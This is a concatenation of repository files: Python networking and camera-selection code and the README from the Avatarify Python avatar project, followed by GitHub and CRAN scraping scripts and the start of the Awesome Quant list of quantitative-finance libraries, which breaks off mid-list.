attr != 'predict' return lambda *args, **kwargs: self._send_recv_async(attr, (args, kwargs), critical=is_critical) def _send_recv_async(self, method, args, critical): self._i_msg += 1 args, kwargs = args tt = TicToc() tt.tic() if method == 'predict': image = args[0] assert isinstance(image, np.ndarray), 'Expected image' ret_code, data = cv2.imencode(".jpg", image, [int(cv2.IMWRITE_JPEG_QUALITY), opt.jpg_quality]) else: data = msgpack.packb((args, kwargs)) self.timing.add('PACK', tt.toc()) meta = { 'name': method, 'critical': critical, 'id': self._i_msg } self.log("send", meta) if critical: self.send_queue.put((meta, data)) while True: meta_recv, data_recv = self.recv_queue.get() if meta_recv == meta: break else: try: # TODO: find good timeout self.send_queue.put((meta, data), timeout=PUT_TIMEOUT) except queue.Full: self.log('send_queue is full') try: meta_recv, data_recv = self.recv_queue.get(timeout=GET_TIMEOUT) except queue.Empty: self.log('recv_queue is empty') return None self.log("recv", meta_recv) tt.tic() if meta_recv['name'] == 'predict': result = cv2.imdecode(np.frombuffer(data_recv, dtype='uint8'), -1) else: result = msgpack.unpackb(data_recv) self.timing.add('UNPACK', tt.toc()) if opt.verbose: Once(self.timing, per=1) return result @staticmethod def send_worker(address, send_queue, worker_alive): timing = AccumDict() log = Logger('./var/log/send_worker.log', opt.verbose) ctx = SerializingContext() sender = ctx.socket(zmq.PUSH) sender.connect(address) log(f"Sending to {address}") try: while worker_alive.value: tt = TicToc() try: msg = send_queue.get(timeout=GET_TIMEOUT) except queue.Empty: continue tt.tic() sender.send_data(*msg) timing.add('SEND', tt.toc()) if opt.verbose: Once(timing, log, per=1) except KeyboardInterrupt: log("send_worker: user interrupt") finally: worker_alive.value = 0 sender.disconnect(address) sender.close() ctx.destroy() log("send_worker exit") @staticmethod def recv_worker(address, recv_queue, worker_alive): timing = AccumDict() log = Logger('./var/log/recv_worker.log') ctx = SerializingContext() receiver = ctx.socket(zmq.PULL) receiver.connect(address) receiver.RCVTIMEO = RECV_TIMEOUT log(f"Receiving from {address}") try: while worker_alive.value: tt = TicToc() try: tt.tic() msg = receiver.recv_data() timing.add('RECV', tt.toc()) except zmq.error.Again: continue try: recv_queue.put(msg, timeout=PUT_TIMEOUT) except queue.Full: log('recv_queue full') continue if opt.verbose: Once(timing, log, per=1) except KeyboardInterrupt: log("recv_worker: user interrupt") finally: worker_alive.value = 0 receiver.disconnect(address) receiver.close() ctx.destroy() log("recv_worker exit") File: afy/camera_selector.py import cv2 import numpy as np import yaml from afy.utils import log g_selected_cam = None def query_cameras(n_cams): cam_frames = {} cap = None for camid in range(n_cams): log(f"Trying camera with id {camid}") cap = cv2.VideoCapture(camid) if not cap.isOpened(): log(f"Camera with id {camid} is not available") continue ret, frame = cap.read() if not ret or frame is None: log(f"Could not read from camera with id {camid}") cap.release() continue for i in range(10): ret, frame = cap.read() cam_frames[camid] = frame.copy() cap.release() return cam_frames def make_grid(images, cell_size=(320, 240), cols=2): w0, h0 = cell_size _rows = len(images) // cols + int(len(images) % cols) _cols = min(len(images), cols) grid = np.zeros((h0 * _rows, w0 * _cols, 3), dtype=np.uint8) for i, (camid, img) in enumerate(images.items()): img = cv2.resize(img, (w0, h0)) # add rect img = cv2.rectangle(img, (1, 1), (w0 - 1, h0 - 1), (0, 0, 255), 2) # add id img = cv2.putText(img, f'Camera {camid}', (10, 30), 0, 1, (0, 255, 0), 2) c = i % cols r = i // cols grid[r * h0:(r + 1) * h0, c * w0:(c + 1) * w0] = img[..., :3] return grid def mouse_callback(event, x, y, flags, userdata): global g_selected_cam if event == 1: cell_size, grid_cols, cam_frames = userdata c = x // cell_size[0] r = y // cell_size[1] camid = r * grid_cols + c if camid < len(cam_frames): g_selected_cam = camid def select_camera(cam_frames, window="Camera selector"): cell_size = 320, 240 grid_cols = 2 grid = make_grid(cam_frames, cols=grid_cols) # to fit the text if only one cam available if grid.shape[1] == 320: cell_size = 640, 480 grid = cv2.resize(grid, cell_size) cv2.putText(grid, f'Click on the web camera to use', (10, grid.shape[0] - 30), 0, 0.7, (200, 200, 200), 2) cv2.namedWindow(window) cv2.setMouseCallback(window, mouse_callback, (cell_size, grid_cols, cam_frames)) cv2.imshow(window, grid) while True: key = cv2.waitKey(10) if g_selected_cam is not None: break if key == 27: break cv2.destroyAllWindows() if g_selected_cam is not None: return list(cam_frames)[g_selected_cam] else: return list(cam_frames)[0] if __name__ == '__main__': with open('config.yaml', 'r') as f: config = yaml.load(f, Loader=yaml.FullLoader) cam_frames = query_cameras(config['query_n_cams']) if cam_frames: selected_cam = select_camera(cam_frames) print(f"Selected camera {selected_cam}") else: log("No cameras are available") File: afy/predictor_worker.py from predictor_local import PredictorLocal from arguments import opt from networking import SerializingContext, check_connection from utils import Logger, TicToc, AccumDict, Once import cv2 import numpy as np import zmq import msgpack import msgpack_numpy as m m.patch() import queue import multiprocessing as mp import traceback import time PUT_TIMEOUT = 1 # s GET_TIMEOUT = 1 # s RECV_TIMEOUT = 1000 # ms QUEUE_SIZE = 100 # class PredictorLocal(): # def __init__(self, *args, **kwargs): # pass # def __getattr__(self, *args, **kwargs): # return lambda *args, **kwargs: None class PredictorWorker(): def __init__(self, in_port=None, out_port=None): self.recv_queue = mp.Queue(QUEUE_SIZE) self.send_queue = mp.Queue(QUEUE_SIZE) self.worker_alive = mp.Value('i', 0) self.recv_process = mp.Process(target=self.recv_worker, args=(in_port, self.recv_queue, self.worker_alive)) self.predictor_process = mp.Process(target=self.predictor_worker, args=(self.recv_queue, self.send_queue, self.worker_alive)) self.send_process = mp.Process(target=self.send_worker, args=(out_port, self.send_queue, self.worker_alive)) def run(self): self.worker_alive.value = 1 self.recv_process.start() self.predictor_process.start() self.send_process.start() try: self.recv_process.join() self.predictor_process.join() self.send_process.join() except KeyboardInterrupt: pass @staticmethod def recv_worker(port, recv_queue, worker_alive): timing = AccumDict() log = Logger('./var/log/recv_worker.log', verbose=opt.verbose) ctx = SerializingContext() socket = ctx.socket(zmq.PULL) socket.bind(f"tcp://*:{port}") socket.RCVTIMEO = RECV_TIMEOUT log(f'Receiving on port {port}', important=True) try: while worker_alive.value: tt = TicToc() try: tt.tic() msg = socket.recv_data() timing.add('RECV', tt.toc()) except zmq.error.Again: log("recv timeout") continue #log('recv', msg[0]) method, data = msg if method['critical']: recv_queue.put(msg) else: try: recv_queue.put(msg, block=False) except queue.Full: log('recv_queue full') Once(timing, log, per=1) except KeyboardInterrupt: log("recv_worker: user interrupt", important=True) worker_alive.value = 0 log("recv_worker exit", important=True) @staticmethod def predictor_worker(recv_queue, send_queue, worker_alive): predictor = None predictor_args = () timing = AccumDict() log = Logger('./var/log/predictor_worker.log', verbose=opt.verbose) try: while worker_alive.value: tt = TicToc() try: method, data = recv_queue.get(timeout=GET_TIMEOUT) except queue.Empty: continue # get the latest non-critical request from the queue # don't skip critical request while not recv_queue.empty() and not method['critical']: log(f"skip {method}") method, data = recv_queue.get() log("working on", method) try: tt.tic() if method['name'] == 'predict': image = cv2.imdecode(np.frombuffer(data, dtype='uint8'), -1) else: args = msgpack.unpackb(data) timing.add('UNPACK', tt.toc()) except ValueError: log("Invalid Message", important=True) continue tt.tic() if method['name'] == "hello": result = "OK" elif method['name'] == "__init__": if args == predictor_args: log("Same config as before... reusing previous predictor") else: del predictor predictor_args = args predictor = PredictorLocal(*predictor_args[0], **predictor_args[1]) log("Initialized predictor with:", predictor_args, important=True) result = True tt.tic() # don't account for init elif method['name'] == 'predict': assert predictor is not None, "Predictor was not initialized" result = getattr(predictor, method['name'])(image) else: assert predictor is not None, "Predictor was not initialized" result = getattr(predictor, method['name'])(*args[0], **args[1]) timing.add('CALL', tt.toc()) tt.tic() if method['name'] == 'predict': assert isinstance(result, np.ndarray), f'Expected np.ndarray, got {result.__class__}' ret_code, data_send = cv2.imencode(".jpg", result, [int(cv2.IMWRITE_JPEG_QUALITY), opt.jpg_quality]) else: data_send = msgpack.packb(result) timing.add('PACK', tt.toc()) if method['critical']: send_queue.put((method, data_send)) else: try: send_queue.put((method, data_send), block=False) except queue.Full: log("send_queue full") pass Once(timing, log, per=1) except KeyboardInterrupt: log("predictor_worker: user interrupt", important=True) except Exception as e: log("predictor_worker error", important=True) traceback.print_exc() worker_alive.value = 0 log("predictor_worker exit", important=True) @staticmethod def send_worker(port, send_queue, worker_alive): timing = AccumDict() log = Logger('./var/log/send_worker.log', verbose=opt.verbose) ctx = SerializingContext() socket = ctx.socket(zmq.PUSH) socket.bind(f"tcp://*:{port}") log(f'Sending on port {port}', important=True) try: while worker_alive.value: tt = TicToc() try: method, data = send_queue.get(timeout=GET_TIMEOUT) except queue.Empty: log("send queue empty") continue # get the latest non-critical request from the queue # don't skip critical request while not send_queue.empty() and not method['critical']: log(f"skip {method}") method, data = send_queue.get() log("sending", method) tt.tic() socket.send_data(method, data) timing.add('SEND', tt.toc()) Once(timing, log, per=1) except KeyboardInterrupt: log("predictor_worker: user interrupt", important=True) worker_alive.value = 0 log("send_worker exit", important=True) def run_worker(in_port=None, out_port=None): worker = PredictorWorker(in_port=in_port, out_port=out_port) worker.run()
![](docs/mona.gif) # Avatarify Python Photorealistic avatars for video-conferencing. Avatarify Python requires manually downloading and installing some dependencies, and is therefore best suited for users who have some experience with command line applications. [Avatarify Desktop](https://github.com/alievk/avatarify-desktop), which aims to be easier to install and use, is recommended for most users. If you still want to use Avatarify Python, proceed to the [install instructions](docs/). Based on [First Order Motion Model](https://github.com/AliaksandrSiarohin/first-order-model). ## News - **7 Mar 2021.** Renamed project to Avatarify Python to distinguish it from other versions of Avatarify - **14 December 2020.** Released Avatarify Desktop. Check it out [here](https://github.com/alievk/avatarify-desktop). - **11 July 2020.** Added Docker support. Now you can run Avatarify from Docker on [Linux](https://github.com/alievk/avatarify-python/blob/master/docs/README.md#docker). Thanks to [mikaelhg](https://github.com/mikaelhg) and [mintmaker](https://github.com/mintmaker) for contribution! - **22 May 2020.** Added [Google Colab](https://colab.research.google.com/github/alievk/avatarify/blob/master/avatarify.ipynb) mode. Now you can run Avatarify on any computer without GPU! - **7 May 2020.** Added remote GPU support for all platforms (based on [mynameisfiber's](https://github.com/mynameisfiber) solution). [Demo](https://youtu.be/3Dz_bUIPYFM). Deployment [instructions](https://github.com/alievk/avatarify-python/wiki/Remote-GPU). - **24 April 2020.** Added Windows installation [tutorial](https://www.youtube.com/watch?v=lym9ANVb120). - **17 April 2020.** Created Slack community. Please join via [invitation link](https://join.slack.com/t/avatarify/shared_invite/zt-dyoqy8tc-~4U2ObQ6WoxuwSaWKKVOgg). - **15 April 2020.** Added [StyleGAN-generated](https://www.thispersondoesnotexist.com) avatars. Just press `Q` and now you drive a person that never existed. Every time you push the button – new avatar is sampled. - **13 April 2020.** Added Windows support (kudos to [9of9](https://github.com/9of9)). ## Avatarify apps We have deployed Avatarify on iOS and Android devices using our proprietary inference engine. The iOS version features the Life mode for recording animations in real time. However, the Life mode is not available on Android devices due to the diversity of the devices we have to support. [<img src=docs/appstore-badge.png alt="drawing" height="40"/>](https://apps.apple.com/app/apple-store/id1512669147?pt=121960189&ct=GitHub&mt=8) [<img src=docs/google-play-badge.png alt="drawing" height="40"/>](https://play.google.com/store/apps/details?id=com.avatarify.android)
awesome-quant
2ab6db153bec32873c94aecb58ade6e1fb71b2c4
File: topic.py import os from github import Github # using an access token g = Github(os.environ['GITHUB_ACCESS_TOKEN']) # ts = g.search_topics('trading') # for t in ts: # print(t) # t = ts[0] # print(t) # print(t.name) # print(t.updated_at) # print(t.score) topic = 'quant' repos = g.search_repositories(query=f'topic:{topic}') for repo in repos: if repo.stargazers_count < 1000: break print(repo.name, repo.stargazers_count, repo.language, repo.html_url, repo.description, repo.updated_at, repo.archived) File: cranscrape.py import requests import re import pandas as pd reu = re.compile(r'https://github.com/([\w-]+/[\w-]+)') red = re.compile(r'\d\d\d\d-\d\d-\d\d') url = 'https://cran.r-project.org/web/packages/xts/index.html' urls = [ 'https://cran.r-project.org/web/packages/xts/index.html', 'https://cran.r-project.org/web/packages/data.table/index.html', 'https://cran.r-project.org/web/packages/tseries/index.html', 'https://cran.r-project.org/web/packages/zoo/index.html', 'https://cran.r-project.org/web/packages/tis/index.html', 'https://cran.r-project.org/web/packages/tfplot/index.html', 'https://cran.r-project.org/web/packages/tframe/index.html', 'https://cran.r-project.org/web/packages/IBrokers/index.html', 'https://cran.r-project.org/web/packages/Rblpapi/index.html', 'https://cran.r-project.org/web/packages/Rbitcoin/index.html', 'https://cran.r-project.org/web/packages/GetTDData/index.html', 'https://cran.r-project.org/web/packages/GetHFData/index.html', 'https://cran.r-project.org/package=td', 'https://cran.r-project.org/web/packages/quantmod/index.html', 'https://cran.r-project.org/web/packages/fAsianOptions/index.html', 'https://cran.r-project.org/web/packages/fAssets/index.html', 'https://cran.r-project.org/web/packages/fBasics/index.html', 'https://cran.r-project.org/web/packages/fBonds/index.html', 'https://cran.r-project.org/web/packages/fExoticOptions/index.html', 'https://cran.r-project.org/web/packages/fOptions/index.html', 'https://cran.r-project.org/web/packages/fPortfolio/index.html', 'https://cran.r-project.org/web/packages/portfolio/index.html', 'https://cran.r-project.org/web/packages/portfolioSim/index.html', 'https://cran.r-project.org/web/packages/sde/index.html', 'https://cran.r-project.org/web/packages/YieldCurve/index.html', 'https://cran.r-project.org/web/packages/SmithWilsonYieldCurve/index.html', 'https://cran.r-project.org/web/packages/ycinterextra/index.html', 'https://cran.r-project.org/web/packages/AmericanCallOpt/index.html', 'https://cran.r-project.org/web/packages/VarSwapPrice/index.html', 'https://cran.r-project.org/web/packages/RND/index.html', 'https://cran.r-project.org/web/packages/LSMonteCarlo/index.html', 'https://cran.r-project.org/web/packages/OptHedging/index.html', 'https://cran.r-project.org/web/packages/tvm/index.html', 'https://cran.r-project.org/web/packages/OptionPricing/index.html', 'https://cran.r-project.org/web/packages/credule/index.html', 'https://cran.r-project.org/web/packages/derivmkts/index.html', 'https://cran.r-project.org/web/packages/PortfolioAnalytics/PortfolioAnalytics.pdf', 'https://cran.r-project.org/web/packages/backtest/index.html', 'https://cran.r-project.org/web/packages/pa/index.html', 'https://cran.r-project.org/web/packages/TTR/index.html', 'https://cran.r-project.org/web/packages/PerformanceAnalytics/index.html', 'https://cran.r-project.org/web/packages/tseries/index.html', 'https://cran.r-project.org/web/packages/zoo/index.html', 'https://cran.r-project.org/web/packages/xts/index.html', 'https://cran.r-project.org/web/packages/fGarch/index.html', 'https://cran.r-project.org/web/packages/timeSeries/index.html', 'https://cran.r-project.org/web/packages/rugarch/index.html', 'https://cran.r-project.org/web/packages/rmgarch/index.html', 'https://cran.r-project.org/web/packages/timeDate/index.html', 'https://cran.r-project.org/web/packages/bizdays/index.html', ] def get_data(url): res = requests.get(url) m = reu.search(res.text) if m: return dict(cran=url, github=m.group(0), repo=m.group(1)) else: return dict(cran=url, github='', repo='') all_data = [get_data(url) for url in urls] df = pd.DataFrame(all_data) df.to_csv('cran.csv', index=False) File: parse.py import os import re import pandas as pd from threading import Thread from github import Github # using an access token g = Github(os.environ['GITHUB_ACCESS_TOKEN']) def extract_repo(url): reu = re.compile(r'^https://github.com/([\w-]+/[-\w\.]+)$') m = reu.match(url) if m: return m.group(1) else: return '' def get_last_commit(repo): try: if repo: r = g.get_repo(repo) cs = r.get_commits() return cs[0].commit.author.date.strftime('%Y-%m-%d') else: return '' except: print('ERROR ' + repo) return 'error' class Project(Thread): def __init__(self, match, section): super().__init__() self._match = match self.regs = None self._section = section def run(self): m = self._match is_github = 'github.com' in m.group(2) is_cran = 'cran.r-project.org' in m.group(2) repo = extract_repo(m.group(2)) print(repo) last_commit = get_last_commit(repo) self.regs = dict( project=m.group(1), section=self._section, last_commit=last_commit, url=m.group(2), description=m.group(3), github=is_github, cran=is_cran, repo=repo ) projects = [] with open('README.md', 'r', encoding='utf8') as f: ret = re.compile(r'^(#+) (.*)$') rex = re.compile(r'^\s*- \[(.*)\]\((.*)\) - (.*)$') m_titles = [] last_head_level = 0 for line in f: m = rex.match(line) if m: p = Project(m, ' > '.join(m_titles[1:])) p.start() projects.append(p) else: m = ret.match(line) if m: hrs = m.group(1) if len(hrs) > last_head_level: m_titles.append(m.group(2)) else: for n in range(last_head_level - len(hrs) + 1): m_titles.pop() m_titles.append(m.group(2)) last_head_level = len(hrs) while True: checks = [not p.is_alive() for p in projects] if all(checks): break projects = [p.regs for p in projects] df = pd.DataFrame(projects) df.to_csv('site/projects.csv', index=False) # df.to_markdown('projects.md', index=False)
# Awesome Quant A curated list of insanely awesome libraries, packages and resources for Quants (Quantitative Finance). [![](https://awesome.re/badge.svg)](https://awesome.re) ## Languages - [Python](#python) - [R](#r) - [Matlab](#matlab) - [Julia](#julia) - [Java](#java) - [JavaScript](#javascript) - [Haskell](#haskell) - [Scala](#scala) - [Ruby](#ruby) - [Elixir/Erlang](#elixirerlang) - [Golang](#golang) - [CPP](#cpp) - [CSharp](#csharp) - [Rust](#rust) - [Frameworks](#frameworks) - [Reproducing Works](#reproducing-works) ## Python ### Numerical Libraries & Data Structures - [numpy](https://www.numpy.org) - NumPy is the fundamental package for scientific computing with Python. - [scipy](https://www.scipy.org) - SciPy (pronounced “Sigh Pie”) is a Python-based ecosystem of open-source software for mathematics, science, and engineering. - [pandas](https://pandas.pydata.org) - pandas is an open source, BSD-licensed library providing high-performance, easy-to-use data structures and data analysis tools for the Python programming language. - [polars](https://docs.pola.rs/) - Polars is a blazingly fast DataFrame library for manipulating structured data. - [quantdsl](https://github.com/johnbywater/quantdsl) - Domain specific language for quantitative analytics in finance and trading. - [statistics](https://docs.python.org/3/library/statistics.html) - Builtin Python library for all basic statistical calculations. - [sympy](https://www.sympy.org/) - SymPy is a Python library for symbolic mathematics. - [pymc3](https://docs.pymc.io/) - Probabilistic Programming in Python: Bayesian Modeling and Probabilistic Machine Learning with Theano. - [modelx](https://docs.modelx.io/) - Python reimagination of spreadsheets as formula-centric objects that are interoperable with pandas. - [ArcticDB](https://github.com/man-group/ArcticDB) - High performance datastore for time series and tick data. ### Financial Instruments and Pricing - [OpenBB Terminal](https://github.com/OpenBB-finance/OpenBBTerminal) - Terminal for investment research for everyone. - [PyQL](https://github.com/enthought/pyql) - QuantLib's Python port. - [pyfin](https://github.com/opendoor-labs/pyfin) - Basic options pricing in Python. *ARCHIVED* - [vollib](https://github.com/vollib/vollib) - vollib is a python library for calculating option prices, implied volatility and greeks. - [QuantPy](https://github.com/jsmidt/QuantPy) - A framework for quantitative finance In python. - [Finance-Python](https://github.com/alpha-miner/Finance-Python) - Python tools for Finance. - [ffn](https://github.com/pmorissette/ffn) - A financial function library for Python. - [pynance](https://github.com/GriffinAustin/pynance) - Lightweight Python library for assembling and analyzing financial data. - [tia](https://github.com/bpsmith/tia) - Toolkit for integration and analysis. - [hasura/base-python-dash](https://platform.hasura.io/hub/projects/hasura/base-python-dash) - Hasura quick start to deploy Dash framework. Written on top of Flask, Plotly.js, and React.js, Dash is ideal for building data visualization apps with highly custom user interfaces in pure Python. - [hasura/base-python-bokeh](https://platform.hasura.io/hub/projects/hasura/base-python-bokeh) - Hasura quick start to visualize data with bokeh library. - [pysabr](https://github.com/ynouri/pysabr) - SABR model Python implementation. - [FinancePy](https://github.com/domokane/FinancePy) - A Python Finance Library that focuses on the pricing and risk-management of Financial Derivatives, including fixed-income, equity, FX and credit derivatives. - [gs-quant](https://github.com/goldmansachs/gs-quant) - Python toolkit for quantitative finance - [willowtree](https://github.com/federicomariamassari/willowtree) - Robust and flexible Python implementation of the willow tree lattice for derivatives pricing. - [financial-engineering](https://github.com/federicomariamassari/financial-engineering) - Applications of Monte Carlo methods to financial engineering projects, in Python. - [optlib](https://github.com/dbrojas/optlib) - A library for financial options pricing written in Python. - [tf-quant-finance](https://github.com/google/tf-quant-finance) - High-performance TensorFlow library for quantitative finance. - [Q-Fin](https://github.com/RomanMichaelPaolucci/Q-Fin) - A Python library for mathematical finance. - [Quantsbin](https://github.com/quantsbin/Quantsbin) - Tools for pricing and plotting of vanilla option prices, greeks and various other analysis around them. - [finoptions](https://github.com/bbcho/finoptions-dev) - Complete python implementation of R package fOptions with partial implementation of fExoticOptions for pricing various options. - [pypme](https://github.com/ymyke/pypme) - PME (Public Market Equivalent) calculation. - [AbsBox](https://github.com/yellowbean/AbsBox) - A Python based library to model cashflow for structured product like Asset-backed securities (ABS) and Mortgage-backed securities (MBS). - [Intrinsic-Value-Calculator](https://github.com/akashaero/Intrinsic-Value-Calculator) - A Python tool for quick calculations of a stock's fair value using Discounted Cash Flow analysis. - [Kelly-Criterion](https://github.com/deltaray-io/kelly-criterion) - Kelly Criterion implemented in Python to size portfolios based on J. L. Kelly Jr's formula. - [rateslib](https://github.com/attack68/rateslib) - A fixed income library for pricing bonds and bond futures, and derivatives such as IRS, cross-currency and FX swaps. ### Indicators - [pandas_talib](https://github.com/femtotrader/pandas_talib) - A Python Pandas implementation of technical analysis indicators. - [finta](https://github.com/peerchemist/finta) - Common financial technical analysis indicators implemented in Pandas. - [Tulipy](https://github.com/cirla/tulipy) - Financial Technical Analysis Indicator Library (Python bindings for [tulipindicators](https://github.com/TulipCharts/tulipindicators)) - [lppls](https://github.com/Boulder-Investment-Technologies/lppls) - A Python module for fitting the [Log-Periodic Power Law Singularity (LPPLS)](https://en.wikipedia.org/wiki/Didier_Sornette#The_JLS_and_LPPLS_models) model. - [talipp](https://github.com/nardew/talipp) - Incremental technical analysis library for Python. - [streaming_indicators](https://github.com/mr-easy/streaming_indicators) - A python library for computing technical analysis indicators on streaming data. ### Trading & Backtesting - [skfolio](https://github.com/skfolio/skfolio) - Python library for portfolio optimization built on top of scikit-learn. It provides a unified interface and sklearn compatible tools to build, tune and cross-validate portfolio models. - [Investing algorithm framework](https://github.com/coding-kitties/investing-algorithm-framework) - Framework for developing, backtesting, and deploying automated trading algorithms. - [QSTrader](https://github.com/mhallsmoore/qstrader) - QSTrader backtesting simulation engine. - [Blankly](https://github.com/Blankly-Finance/Blankly) - Fully integrated backtesting, paper trading, and live deployment. - [TA-Lib](https://github.com/mrjbq7/ta-lib) - Python wrapper for TA-Lib (<http://ta-lib.org/>). - [zipline](https://github.com/quantopian/zipline) - Pythonic algorithmic trading library. - [QuantSoftware Toolkit](https://github.com/QuantSoftware/QuantSoftwareToolkit) - Python-based open source software framework designed to support portfolio construction and management. - [quantitative](https://github.com/jeffrey-liang/quantitative) - Quantitative finance, and backtesting library. - [analyzer](https://github.com/llazzaro/analyzer) - Python framework for real-time financial and backtesting trading strategies. - [bt](https://github.com/pmorissette/bt) - Flexible Backtesting for Python. - [backtrader](https://github.com/backtrader/backtrader) - Python Backtesting library for trading strategies. - [pythalesians](https://github.com/thalesians/pythalesians) - Python library to backtest trading strategies, plot charts, seamlessly download market data, analyze market patterns etc. - [pybacktest](https://github.com/ematvey/pybacktest) - Vectorized backtesting framework in Python / pandas, designed to make your backtesting easier. - [pyalgotrade](https://github.com/gbeced/pyalgotrade) - Python Algorithmic Trading Library. - [basana](https://github.com/gbeced/basana) - A Python async and event driven framework for algorithmic trading, with a focus on crypto currencies. - [tradingWithPython](https://pypi.org/project/tradingWithPython/) - A collection of functions and classes for Quantitative trading. - [Pandas TA](https://github.com/twopirllc/pandas-ta) - Pandas TA is an easy to use Python 3 Pandas Extension with 115+ Indicators. Easily build Custom Strategies. - [ta](https://github.com/bukosabino/ta) - Technical Analysis Library using Pandas (Python) - [algobroker](https://github.com/joequant/algobroker) - This is an execution engine for algo trading. - [pysentosa](https://pypi.org/project/pysentosa/) - Python API for sentosa trading system. - [finmarketpy](https://github.com/cuemacro/finmarketpy) - Python library for backtesting trading strategies and analyzing financial markets. - [binary-martingale](https://github.com/metaperl/binary-martingale) - Computer program to automatically trade binary options martingale style. - [fooltrader](https://github.com/foolcage/fooltrader) - the project using big-data technology to provide an uniform way to analyze the whole market. - [zvt](https://github.com/zvtvz/zvt) - the project using sql, pandas to provide an uniform and extendable way to record data, computing factors, select securities, backtesting, realtime trading and it could show all of them in clearly charts in realtime. - [pylivetrader](https://github.com/alpacahq/pylivetrader) - zipline-compatible live trading library. - [pipeline-live](https://github.com/alpacahq/pipeline-live) - zipline's pipeline capability with IEX for live trading. - [zipline-extensions](https://github.com/quantrocket-llc/zipline-extensions) - Zipline extensions and adapters for QuantRocket. - [moonshot](https://github.com/quantrocket-llc/moonshot) - Vectorized backtester and trading engine for QuantRocket based on Pandas. - [PyPortfolioOpt](https://github.com/robertmartin8/PyPortfolioOpt) - Financial portfolio optimization in python, including classical efficient frontier and advanced methods. - [Eiten](https://github.com/tradytics/eiten) - Eiten is an open source toolkit by Tradytics that implements various statistical and algorithmic investing strategies such as Eigen Portfolios, Minimum Variance Portfolios, Maximum Sharpe Ratio Portfolios, and Genetic Algorithms based Portfolios. - [riskparity.py](https://github.com/dppalomar/riskparity.py) - fast and scalable design of risk parity portfolios with TensorFlow 2.0 - [mlfinlab](https://github.com/hudson-and-thames/mlfinlab) - Implementations regarding "Advances in Financial Machine Learning" by Marcos Lopez de Prado. (Feature Engineering, Financial Data Structures, Meta-Labeling) - [pyqstrat](https://github.com/abbass2/pyqstrat) - A fast, extensible, transparent python library for backtesting quantitative strategies. - [NowTrade](https://github.com/edouardpoitras/NowTrade) - Python library for backtesting technical/mechanical strategies in the stock and currency markets. - [pinkfish](https://github.com/fja05680/pinkfish) - A backtester and spreadsheet library for security analysis. - [aat](https://github.com/timkpaine/aat) - Async Algorithmic Trading Engine - [Backtesting.py](https://kernc.github.io/backtesting.py/) - Backtest trading strategies in Python - [catalyst](https://github.com/enigmampc/catalyst) - An Algorithmic Trading Library for Crypto-Assets in Python - [quantstats](https://github.com/ranaroussi/quantstats) - Portfolio analytics for quants, written in Python - [qtpylib](https://github.com/ranaroussi/qtpylib) - QTPyLib, Pythonic Algorithmic Trading <http://qtpylib.io> - [Quantdom](https://github.com/constverum/Quantdom) - Python-based framework for backtesting trading strategies & analyzing financial markets [GUI :neckbeard:] - [freqtrade](https://github.com/freqtrade/freqtrade) - Free, open source crypto trading bot - [algorithmic-trading-with-python](https://github.com/chrisconlan/algorithmic-trading-with-python) - Free `pandas` and `scikit-learn` resources for trading simulation, backtesting, and machine learning on financial data. - [DeepDow](https://github.com/jankrepl/deepdow) - Portfolio optimization with deep learning - [Qlib](https://github.com/microsoft/qlib) - An AI-oriented Quantitative Investment Platform by Microsoft. Full ML pipeline of data processing, model training, back-testing; and covers the entire chain of quantitative investment: alpha seeking, risk modeling, portfolio optimization, and order execution. - [machine-learning-for-trading](https://github.com/stefan-jansen/machine-learning-for-trading) - Code and resources for Machine Learning for Algorithmic Trading - [AlphaPy](https://github.com/ScottfreeLLC/AlphaPy) - Automated Machine Learning [AutoML] with Python, scikit-learn, Keras, XGBoost, LightGBM, and CatBoost - [jesse](https://github.com/jesse-ai/jesse) - An advanced crypto trading bot written in Python - [rqalpha](https://github.com/ricequant/rqalpha) - A extendable, replaceable Python algorithmic backtest && trading framework supporting multiple securities. - [FinRL-Library](https://github.com/AI4Finance-LLC/FinRL-Library) - A Deep Reinforcement Learning Library for Automated Trading in Quantitative Finance. NeurIPS 2020. - [bulbea](https://github.com/achillesrasquinha/bulbea) - Deep Learning based Python Library for Stock Market Prediction and Modelling. - [ib_nope](https://github.com/ajhpark/ib_nope) - Automated trading system for NOPE strategy over IBKR TWS. - [OctoBot](https://github.com/Drakkar-Software/OctoBot) - Open source cryptocurrency trading bot for high frequency, arbitrage, TA and social trading with an advanced web interface. - [bta-lib](https://github.com/mementum/bta-lib) - Technical Analysis library in pandas for backtesting algotrading and quantitative analysis. - [Stock-Prediction-Models](https://github.com/huseinzol05/Stock-Prediction-Models) - Gathers machine learning and deep learning models for Stock forecasting including trading bots and simulations. - [TuneTA](https://github.com/jmrichardson/tuneta) - TuneTA optimizes technical indicators using a distance correlation measure to a user defined target feature such as next day return. - [AutoTrader](https://github.com/kieran-mackle/AutoTrader) - A Python-based development platform for automated trading systems - from backtesting to optimization to livetrading. - [fast-trade](https://github.com/jrmeier/fast-trade) - A library built with backtest portability and performance in mind for backtest trading strategies. - [qf-lib](https://github.com/quarkfin/qf-lib) - QF-Lib is a Python library that provides high quality tools for quantitative finance. - [tda-api](https://github.com/alexgolec/tda-api) - Gather data and trade equities, options, and ETFs via TDAmeritrade. - [vectorbt](https://github.com/polakowo/vectorbt) - Find your trading edge, using a powerful toolkit for backtesting, algorithmic trading, and research. - [Lean](https://github.com/QuantConnect/Lean) - Lean Algorithmic Trading Engine by QuantConnect (Python, C#). - [fast-trade](https://github.com/jrmeier/fast-trade) - Low code backtesting library utilizing pandas and technical analysis indicators. - [pysystemtrade](https://github.com/robcarver17/pysystemtrade) - pysystemtrade is the open source version of Robert Carver's backtesting and trading engine that implements systems according to the framework outlined in his book "Systematic Trading", which is further developed on his [blog](https://qoppac.blogspot.com/). - [pytrendseries](https://github.com/rafa-rod/pytrendseries) - Detect trend in time series, drawdown, drawdown within a constant look-back window , maximum drawdown, time underwater. - [PyLOB](https://github.com/DrAshBooth/PyLOB) - Fully functioning fast Limit Order Book written in Python. - [PyBroker](https://github.com/edtechre/pybroker) - Algorithmic Trading with Machine Learning. - [OctoBot Script](https://github.com/Drakkar-Software/OctoBot-Script) - A quant framework to create cryptocurrencies strategies - from backtesting to optimization to livetrading. - [hftbacktest](https://github.com/nkaz001/hftbacktest) - A high-frequency trading and market-making backtesting tool accounts for limit orders, queue positions, and latencies, utilizing full tick data for trades and order books. - [vnpy](https://github.com/vnpy/vnpy) - VeighNa is a Python-based open source quantitative trading system development framework. - [Intelligent Trading Bot](https://github.com/asavinov/intelligent-trading-bot) - Automatically generating signals and trading based on machine learning and feature engineering - [fastquant](https://github.com/enzoampil/fastquant) - fastquant allows you to easily backtest investment strategies with as few as 3 lines of python code. - 